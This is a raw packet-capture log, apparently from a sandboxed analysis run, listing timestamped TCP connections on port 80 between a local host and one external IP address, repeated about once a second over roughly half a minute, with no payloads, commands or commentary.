Aug 19, 2024 06:04:58.460465908 CEST	49782	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:58.648392916 CEST	49782	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:58.648720980 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:58.653587103 CEST	80	49783	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:58.653650999 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:58.653781891 CEST	80	49782	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:58.653829098 CEST	49782	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:58.742038012 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:58.746879101 CEST	80	49783	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:59.404010057 CEST	80	49783	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:59.404102087 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.446650028 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.451464891 CEST	80	49783	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:59.697982073 CEST	80	49783	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:59.698048115 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.832672119 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.833249092 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.837768078 CEST	80	49783	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:59.837819099 CEST	49783	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.837958097 CEST	80	49784	185.215.113.16	192.168.2.4
Aug 19, 2024 06:04:59.838026047 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.838140965 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:04:59.842844009 CEST	80	49784	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:00.586883068 CEST	80	49784	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:00.586968899 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.587604046 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.592341900 CEST	80	49784	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:00.838459015 CEST	80	49784	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:00.838572025 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.945563078 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.945868015 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.952065945 CEST	80	49785	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:00.952182055 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.952277899 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.952382088 CEST	80	49784	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:00.952435970 CEST	49784	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:00.958673954 CEST	80	49785	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:01.791285038 CEST	80	49785	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:01.791337013 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:01.813167095 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:01.817961931 CEST	80	49785	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:02.067249060 CEST	80	49785	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:02.067318916 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:02.182135105 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:02.182463884 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:02.187336922 CEST	80	49786	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:02.187347889 CEST	80	49785	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:02.187527895 CEST	49785	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:02.187544107 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:02.187730074 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:02.192518950 CEST	80	49786	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:02.954927921 CEST	80	49786	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:02.955137968 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.012852907 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.017781973 CEST	80	49786	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:03.264133930 CEST	80	49786	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:03.264297009 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.367429018 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.367690086 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.372509956 CEST	80	49787	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:03.372615099 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.372756004 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.372853994 CEST	80	49786	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:03.372937918 CEST	49786	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:03.377473116 CEST	80	49787	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:04.141145945 CEST	80	49787	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:04.141275883 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.142515898 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.147294998 CEST	80	49787	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:04.420346975 CEST	80	49787	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:04.420464993 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.526321888 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.526659012 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.531497002 CEST	80	49788	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:04.531511068 CEST	80	49787	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:04.531609058 CEST	49787	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.531611919 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.531793118 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:04.536564112 CEST	80	49788	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:05.284898043 CEST	80	49788	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:05.285038948 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.285657883 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.290395021 CEST	80	49788	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:05.537102938 CEST	80	49788	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:05.537193060 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.649525881 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.649952888 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.654807091 CEST	80	49788	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:05.654835939 CEST	80	49789	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:05.654870987 CEST	49788	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.654923916 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.655040026 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:05.659766912 CEST	80	49789	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:06.404422998 CEST	80	49789	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:06.404495001 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.407891035 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.412722111 CEST	80	49789	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:06.663551092 CEST	80	49789	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:06.663605928 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.788885117 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.790608883 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.793977022 CEST	80	49789	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:06.794017076 CEST	49789	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.795381069 CEST	80	49790	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:06.795448065 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.795744896 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:06.800591946 CEST	80	49790	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:07.574040890 CEST	80	49790	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:07.576483965 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.579018116 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.583857059 CEST	80	49790	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:07.833329916 CEST	80	49790	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:07.833594084 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.951205015 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.951536894 CEST	49791	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.956293106 CEST	80	49790	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:07.956346989 CEST	80	49791	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:07.956392050 CEST	49790	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.956427097 CEST	49791	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.957067966 CEST	49791	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:07.961874008 CEST	80	49791	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:08.740272045 CEST	80	49791	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:08.740367889 CEST	49791	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:08.744484901 CEST	49791	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:08.744759083 CEST	49792	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:08.749569893 CEST	80	49792	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:08.749778032 CEST	49792	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:08.749866962 CEST	80	49791	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:08.750181913 CEST	49791	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:08.750328064 CEST	49792	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:08.755136013 CEST	80	49792	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:09.533279896 CEST	80	49792	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:09.534606934 CEST	49792	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:09.655390024 CEST	49792	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:09.655692101 CEST	49793	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:09.661062956 CEST	80	49793	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:09.661076069 CEST	80	49792	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:09.661134958 CEST	49793	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:09.661160946 CEST	49792	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:09.661549091 CEST	49793	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:09.667125940 CEST	80	49793	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:10.422943115 CEST	80	49793	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:10.423438072 CEST	49793	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:10.506582022 CEST	49793	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:10.506855965 CEST	49794	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:10.511616945 CEST	80	49794	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:10.511679888 CEST	80	49793	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:10.511748075 CEST	49793	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:10.511761904 CEST	49794	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:10.512006998 CEST	49794	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:10.516766071 CEST	80	49794	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:11.269042015 CEST	80	49794	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:11.269108057 CEST	49794	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:11.385488033 CEST	49794	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:11.386126995 CEST	49795	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:11.390767097 CEST	80	49794	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:11.390969038 CEST	80	49795	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:11.391021967 CEST	49794	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:11.391053915 CEST	49795	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:11.391357899 CEST	49795	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:11.396119118 CEST	80	49795	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:12.151005983 CEST	80	49795	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:12.151057959 CEST	49795	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:12.171309948 CEST	49795	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:12.171870947 CEST	49796	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:12.176414967 CEST	80	49795	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:12.176485062 CEST	49795	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:12.176676035 CEST	80	49796	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:12.176835060 CEST	49796	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:12.178961992 CEST	49796	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:12.183756113 CEST	80	49796	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:12.982997894 CEST	80	49796	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:12.983439922 CEST	49796	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.088375092 CEST	49796	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.089891911 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.093770981 CEST	80	49796	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:13.093812943 CEST	49796	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.094785929 CEST	80	49797	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:13.094854116 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.095339060 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.100346088 CEST	80	49797	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:13.846007109 CEST	80	49797	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:13.846074104 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.890846968 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:13.895782948 CEST	80	49797	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:14.138700008 CEST	80	49797	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:14.138825893 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:14.246926069 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:14.247210979 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:14.252191067 CEST	80	49797	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:14.252427101 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:14.252475977 CEST	49797	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:14.252533913 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:14.254865885 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:14.262276888 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:15.014260054 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:15.014481068 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:15.022809982 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:15.027771950 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:15.867674112 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:15.867757082 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:15.867835045 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:15.868498087 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:15.868552923 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.004309893 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.005055904 CEST	49799	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.009603977 CEST	80	49798	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:16.009663105 CEST	49798	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.009891987 CEST	80	49799	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:16.010073900 CEST	49799	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.010960102 CEST	49799	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.015805006 CEST	80	49799	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:16.749135971 CEST	80	49799	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:16.749294996 CEST	49799	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.759704113 CEST	49799	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.759974003 CEST	49800	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.764794111 CEST	80	49800	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:16.764928102 CEST	80	49799	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:16.765001059 CEST	49799	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.765016079 CEST	49800	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.765265942 CEST	49800	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:16.770172119 CEST	80	49800	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:17.531069040 CEST	80	49800	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:17.531147957 CEST	49800	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:17.651238918 CEST	49800	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:17.651580095 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:17.656439066 CEST	80	49801	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:17.656572104 CEST	80	49800	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:17.656646967 CEST	49800	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:17.656658888 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:17.657097101 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:17.661931038 CEST	80	49801	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:18.405919075 CEST	80	49801	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:18.406672001 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.409421921 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.414237976 CEST	80	49801	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:18.656764984 CEST	80	49801	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:18.656850100 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.796802044 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.797081947 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.801963091 CEST	80	49802	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:18.802031994 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.802098036 CEST	80	49801	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:18.802155018 CEST	49801	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.802552938 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:18.807394028 CEST	80	49802	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:19.554543018 CEST	80	49802	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:19.556514978 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.559302092 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.564285040 CEST	80	49802	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:19.808276892 CEST	80	49802	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:19.808399916 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.925179005 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.925755978 CEST	49803	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.930408955 CEST	80	49802	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:19.930469990 CEST	49802	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.930604935 CEST	80	49803	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:19.930676937 CEST	49803	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.943123102 CEST	49803	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:19.947937965 CEST	80	49803	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:20.677675962 CEST	80	49803	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:20.677737951 CEST	49803	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:20.687202930 CEST	49803	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:20.687566042 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:20.692409992 CEST	80	49804	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:20.692485094 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:20.692559958 CEST	80	49803	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:20.692635059 CEST	49803	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:20.693059921 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:20.697881937 CEST	80	49804	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:22.226727009 CEST	80	49804	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:22.226747036 CEST	80	49804	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:22.226784945 CEST	80	49804	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:22.226808071 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.226808071 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.226830006 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.363495111 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.363903999 CEST	49805	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.368804932 CEST	80	49805	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:22.368844986 CEST	80	49804	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:22.368880987 CEST	49805	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.368957996 CEST	49804	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.371018887 CEST	49805	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:22.375911951 CEST	80	49805	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:23.116455078 CEST	80	49805	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:23.120474100 CEST	49805	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:23.143558979 CEST	49805	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:23.143996000 CEST	49806	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:23.148636103 CEST	80	49805	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:23.148802996 CEST	80	49806	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:23.148869991 CEST	49805	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:23.148899078 CEST	49806	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:23.149142027 CEST	49806	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:23.153909922 CEST	80	49806	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:23.919296980 CEST	80	49806	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:23.919361115 CEST	49806	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.025818110 CEST	49806	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.026114941 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.030946970 CEST	80	49807	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:24.031023026 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.031210899 CEST	80	49806	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:24.031250954 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.031264067 CEST	49806	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.036051035 CEST	80	49807	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:24.785573959 CEST	80	49807	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:24.785631895 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.801116943 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:24.805983067 CEST	80	49807	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:25.049904108 CEST	80	49807	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:25.049957991 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.166688919 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.167062998 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.171674013 CEST	80	49807	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:25.171730042 CEST	49807	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.171890974 CEST	80	49808	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:25.172451973 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.172677994 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.177408934 CEST	80	49808	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:25.931037903 CEST	80	49808	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:25.931128979 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.934346914 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:25.939327955 CEST	80	49808	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:26.184016943 CEST	80	49808	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:26.184077978 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:26.316462040 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:26.316780090 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:26.321594000 CEST	80	49809	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:26.321676970 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:26.321682930 CEST	80	49808	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:26.321739912 CEST	49808	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:26.321974039 CEST	49809	80	192.168.2.4	185.215.113.16
Aug 19, 2024 06:05:26.327157021 CEST	80	49809	185.215.113.16	192.168.2.4
Aug 19, 2024 06:05:27.068691015 CEST	80	49809	185.215.113.16	192.168.2.4
